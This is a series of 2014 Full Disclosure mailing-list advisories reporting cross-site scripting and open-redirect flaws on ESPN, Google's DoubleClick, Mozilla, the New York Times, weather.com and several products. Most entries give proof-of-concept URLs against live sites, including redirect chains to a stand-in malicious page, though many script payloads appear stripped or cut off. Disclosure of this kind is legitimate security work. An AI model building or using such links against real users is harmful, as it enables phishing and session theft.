Redirect) attacks.


Those vulnerabilities are very dangerous. Since they happen at ESPN's
"login" & "register" pages that are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages
with "redirect" parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn®FormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459";>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn®FormId=espn";>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate";>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login";>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html





*(2) Dest Redirect Privilege Escalation Vulnerability*

Use one of webpages for the following tests. The webpage address is "
http://www.diebiyi.com/";. Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112

[FD] CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

[Jing Wang]

*CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints"
Dest Redirect Privilege Escalation Security Vulnerability*





Exploit Title: "Ping Identity Corporation" "PingFederate 6.10.1 SP
Endpoints" Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]








*Advisory Details*



*(1) Product:*
"PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning."




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at "/startSSO.ping?" page with
"&TargetResource" parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-8751  goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*







Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details:*

*(1) Product*
"WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself."



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at "/search.php" page with
"&search_param" parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at "/forms.php" (form
submission ) page with "&name", "&address" "&comment" parameters in HTTP
POST.










*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (cross site scripting) Attacks

[Jing Wang]

*All Links in **Two Topics of Indiatimes (indiatimes.com
) Are Vulnerable to XSS (cross site scripting)
Attacks *




*Domain Description:*

http://www.indiatimes.com


"According to the Indian Readership Survey (IRS) 2012, the Times of India
is the most widely read English newspaper in India with a readership of
7.643 million. This ranks the Times of India as the top English daily in
India by readership." (en.Wikipedia.org )







*Vulnerability description:*


The vulnerability occurs at Indiatimes's URL links. Indiatimes only filter
part of the filenames in its website. All URLs under Indiatimes's
"photogallery" and "top-llists" topics are affected.


Indiatimes uses part of the links under "photogallery" and "top-llists"
topics to construct its website content without any checking of those links
at all. This mistake is very popular in nowaday websites. Developer is not
security expert.



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes:*

http://www.indiatimes.com/photogallery/";>

http://www.indiatimes.com/top-lists/";>

http://www.indiatimes.com/photogallery/lifestyle/";>

http://www.indiatimes.com/top-lists/technology/";>





*POC Video:*

https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html






The vulnerabilities were reported to Indiatimes in early September, 2014.
However they are still unpatched.









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation

[Jing Wang]

*CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege
Escalation*





Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege
Escalation Vulnerability

Product: WordPress Ad-Manager Plugin

Vendor: CodeCanyon

Vulnerable Versions: 1.1.2

Tested Version: 1.1.2

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]

CVE Reference: CVE-2014-8754

CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)

Impact Subscore: 4.9

Exploitability Subscore: 8.6

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

“WordPress Ad-Manager offers users a simple solution to implement
advertising into their posts, their blog or any other WordPress page. Users
can use pictures and images or HTML snippets like Google AdSense to
incorporate advertising in an easy way.”



*(2) Vulnerability Details:*

The Dest Redirect Privilege Escalation vulnerability occurs at
“track-click.php” page with “&out” parameter.






*References:*

http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/

http://codecanyon.net/item/wordpress-admanager/544421

https://wordpress.org/plugins/ad-manager-for-wp/

http://cwe.mitre.org

http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-7291 Springshare LibCal XSS (Cross-Site Scripting) Vulnerability

[Jing Wang]

*Exploit Title: Springshare LibCal XSS (Cross-Site Scripting) Vulnerability*

Product: LibCal

Vendor: Springshare

Vulnerable Versions: 2.0

Tested Version: 2.0

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-7291

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Solution Status: Fixed by Vendor

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

"Springshare LibCal is an easy to use calendaring and event management
platform for libraries. Used by 1,600+ libraries worldwide."



*(2) Vulnerability Details:*

The XSS vulnerabilities occur at "/api_events.php?" page, with "&m" and
"&cid" parameters.



*(3) Solutions:*

2014-10-01: Report vulnerability to Vendor

2014-10-15: Vendor replied with thanks and vendor changed the source code









*References:*

http://tetraph.com/security/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-vulnerability/

http://www.springshare.com/libcal/

http://cwe.mitre.org

http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] The Weather Channel weather.com Almost All Links Vulnerable to XSS Attacks

[Jing Wang]

*The Weather Channel weather.com  Almost All Links
Vulnerable to XSS Attacks*





Domain Description:

http://www.weather.com/


"The Weather Channel is an American basic cable and satellite television
channel which broadcasts weather forecasts and weather-related news and
analyses, along with documentaries and entertainment programming related to
weather."


"As of August 2013, The Weather Channel was received by approximately
99,926,000 American households that subscribe to a pay television service
(87.50% of U.S. households with television), making it the most common
cable channel in the country." (Wikipedia)






*Vulnerability description:*


Almost all links under the domain weather.com are vulnerable to XSS
attacks. Attackers just need to add script at the end of The Weather
Channel's URLs. Then the scripts will be executed.


10 thousands of Links were tested based a self-written tool. During the
tests, 76.3% of links belong to weather.com were vulnerable to XSS attacks.


The reason of this vulnerability is that Weather Channel uses URLs to
construct its tags without filtering malicious script codes.


The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes, e.g.*

http://www.weather.com/slideshows/main/"--/>">

http://www.weather.com/home-garden/home/white-house-lawns-20140316%22--/"--/>">t%28%27justqdjing%27%29%3E

http://www.weather.com/news/main/";>






*POC Video:*

https://www.youtube.com/watch?v=Ij78WnzKB4M&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/the-weather-channel-weather.html





The Weather Channel has patched this Vulnerability in late November, 2014
(last Week).









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-7290 Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability

[Jing Wang]

CVE-2014-7290  Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability


Exploit Title: Atlas Systems Aeon XSS Vulnerability
Product: Aeon
Vendor: Atlas Systems
Vulnerable Versions: 3.6 3.5
Tested Version: 3.6
Advisory Publication: Nov 12, 2014
Latest Update: Nov 12, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7290
Solution Status: Fixed by Vendor
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





Advisory Details:

(1) Aeon

Aeon is special collections circulation and workflow automation software
for your special collections library designed by special collections
librarians.

Aeon improves customer service and staff efficiency while providing
unparalleled item tracking, security and statistics.



(2) However, it is vulnerable to XSS Attacks.

(2.1) The first vulnerability occurs at "aeon.dll?" page, with "&Action"
parameter.
(2.2) The second vulnerability occurs at "aeon.dll?" page, with "&Form"
parameter.




Solutions:
2014-09-01: Report vulnerability to Vendor
2014-10-05: Vendor replied with thanks and vendor will change the source
code





References:
http://tetraph.com/security/xss-vulnerability/cve-2014-7290-atlas-systems-aeon-xss-cross-site-scripting-vulnerability/
https://prometheus.atlas-sys.com/display/aeon/Aeon+3.6+Release+Notes
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

[Jing Wang]

Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

-- Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net




The vulnerability exists at "Logout?" page with "&continue" parameter, i.e.
https://www.google.com/accounts/Logout?service=writely&continue=https://googleads.g.doubleclick.net



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.



(1) When a user is redirected from Google to another site, Google will
check whether the redirected URL belongs to domains in Google's whitelist
(The whitelist usually contains websites belong to Google), e.g.
docs.google.com
googleads.g.doubleclick.net



If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection
 vulnerabilities themselves, a user could be redirected from Google to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Google directly.

One of the vulnerable domain is,
googleads.g.doubleclick.net (Google's Ad System)




(2) Use one webpage for the following tests. The webpage address is "
http://www.inzeed.com/kaleidoscope";. We can suppose that this webpage is
malicious.



Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/



POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope



POC Video:
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be



Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing





More Details:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

[Jing Wang]

Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities
Can be Used by Spammers



Although Google does not include Open Redirect vulnerabilities in its bug
bounty program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.

However, Google might have overlooked the security of its DoubleClick.net
 ​advertising system. After some test, it is found
that most of the redirection URLs within DoubleClick.net
 are vulnerable to Open Redirect vulnerabilities.
Many redirection are likely to be affected.

These redirections can be easily used by spammers, too.

Some URLs belong to Googleads.g.Doubleclick.net
 are vulnerable to Open Redirect
attacks, too. While Google prevents similar URL redirections other than
Googleads.g.Doubleclick.net . Attackers
can use URLs related to Google Account to make the attacks more powerful.

Moreover, these vulnerabilities can be used to attack other companies such
as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect
filters(Covert Redirect).




*(1) Background Related to Google DoubleClick.net.*



*(1.1) What is DoubleClick.net?*

"DoubleClick is the ad technology foundation to create, transact, and
manage digital advertising for the world's buyers, creators and sellers."
http://www.google.com.sg/doubleclick/



*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*


*(1.2.1)*

Google DoublClick.net has been used by spammers for long time. The
following is a report in 2008.

"The open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain."
https://www.virusbtn.com/blog/2008/06_03a.xml?comments


*(1.2.2)*

Mitechmate published a blog related to DoubleClick.net spams in 2014.

"Ad.doubleclick.net  is recognized as a
perilous adware application that causes unwanted redirections when surfing
on the certain webpages. Actually it is another browser hijacker that aims
to distribute frauds to make money.Commonly people pick up Ad.doubleclick
virus when download softwares, browse porn site or read spam email
attachments. It enters into computer sneakily after using computer
insecurely.Ad.doubleclick.net  is
not just annoying, this malware traces users’ personal information, which
would be utilized for cyber criminal."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/


*(1.2.3)*

Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.

"Large malvertising campaign under way involving DoubleClick and Zedo"
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/




*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be attacked without user login. Tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

Used webpages for the following tests. The webpage address is "
http://www.tetraph.com/security";. We can suppose that this webpage is
malicious.



*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net
.*


*(2.1.1)*

Some URLs belong to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks. While Google prevents similar URL redirection other than
googleads.g.doubleclick.net.


Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo

http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com


POC:
http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security

http://googleads.g.

[FD] Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

[Jing Wang]

Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)




Websites information:
lxr.mozilla.org, mxr.mozilla.org are cross references designed to display
the Mozilla source code. The sources displayed are those that are currently
checked in to the mainline of the mozilla.org CVS server, Mercurial Server,
and Subversion Server; these pages are updated many times a day, so they
should be pretty close to the latest‑and‑greatest. (from Mozilla)




Vulnerability description:
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


This means all URLs under the above two domains can be used for XSS attacks
targeting Mozilla's users.

Since there are large number of pages under them. Meanwhile, the contents
of the two domains vary. This makes the vulnerability very dangerous.
Attackers can use different URLs to design XSS attacks to Mozilla's variety
class of users.

The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are
dealing with this issue.




POCs:
http://lxr.mozilla.org/mozilla-central/source/
http://lxr.mozilla.org/mozilla-central/source/mobile/android/
http://lxr.mozilla.org/mozilla-central/source/Android.mk/
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp


http://mxr.mozilla.org/mozilla-central/source/
http://mxr.mozilla.org/mozilla-central/source/webapprt/
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/

We can see that for the page reflected, it contains the following codes.




If we insert "" into the URL, the code
can be executed.




The vulnerability can be attacked without user login. My tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.


Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy. (From Wikipedia)




Posted By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-7292 Newtelligence dasBlog Open Redirect Vulnerability

[Jing Wang]

Exploit Title: Newtelligence dasBlog Open Redirect Vulnerability
Product: dasBlog
Vendor: Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820) 2.2 (2.2.8279.16125)
2.1(2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update: OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7292
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]




Advisory Details:

Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.


dasBlog supports a feature called Click-Through which basically tracks all
links clicked inside your blog posts. It's a nice feature that allows the
blogger to stay informed what kind of content readers like. If
Click-Through is turned on, all URLs inside blog entries will be replaced
with /ct.ashx?id=&url= which of course breaks WebSnapr previews.


Web.config code:



(1) The vulnerability occurs at "ct.ashx?" page, with "&url" parameter.



Solutions:
2014-10-15 Public disclosure with self-written patch.




References:
http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/
https://searchcode.com/codesearch/view/8710666/
https://www.microsoft.com/web/gallery/dasblog.aspx
https://dasblog.codeplex.com/releases/view/86033
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

[Jing Wang]

New York Times nytimes.com Page Design XSS Vulnerability (Almost all
Article Pages Before 2013 are Affected)


Domain:
http://www.nytimes.com/



Vulnerability Description:
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New
York Times) uses part of the URLs to construct its pages. However, it seems
that Nytimes does not filter the content used for the construction at all
before 2013.

Based on Nytimes’s Design, Almost all URLs before 2013 are affected (All
pages of articles). In fact, all article pages that contain “PRINT” button,
“SINGLE PAGE” button, “Page *” button, “NEXT PAGE” button are affected.

Nytimes changed this mechanism since 2013. It decodes the URLs sent to its
server. This makes the mechanism much safer now.

However, all URLs before 2013 are still using the old mechanism. This means
almost all article pages before 2013 are still vulnerable to XSS attacks. I
guess the reason Nytimes does not filter URLs before is cost. It costs too
much (money & human capital) to change the database of all posted articles
before.




Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“>
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“>?pagewanted=all&_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“>
http://www.nytimes.com/2009/08/06/technology/06stats.html/“>
http://www.nytimes.com/2008/07/09/dining/091crex.html/“>
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“>




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/
“>
Print




Single Page
 

 2


 3


Next
Page »





The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy.





Reported By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-2230 - OpenX Open Redirect Vulnerability

[Jing Wang]

Exploit Title: OpenX Open Redirect Vulnerability
Product: OpenX
Vendor:  OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: OCT 8, 2014
Latest Update:  OCT 8, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-2230
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







Vulnerability Details:

OpenX adclick.php, ck.php, vulnerable to Open Redirect attacks.

Source code of adclick.php:
$destination = MAX_querystringGetDestinationUrl($adId[0]);
MAX_redirect($destination);

The "MAX_redirect" function is bellow,
function MAX_redirect($url)
{
if (!preg_match('/^(?:javascript|data):/i', $url)) {
header('Location: '.$url);
MAX_sendStatusCode(302);
}

The header() function sends a raw HTTP header to a client without any
checking of the "$dest" parameter at all.


(1) For "adclick.php", the vulnerability occurs with "&dest" parameter.


(2) For "ck.php", it uses "adclick.php" file. the vulnerability occurs with
"_maxdest" parameter.








Solutions:
2014-10-12 Public disclosure with self-written patch.


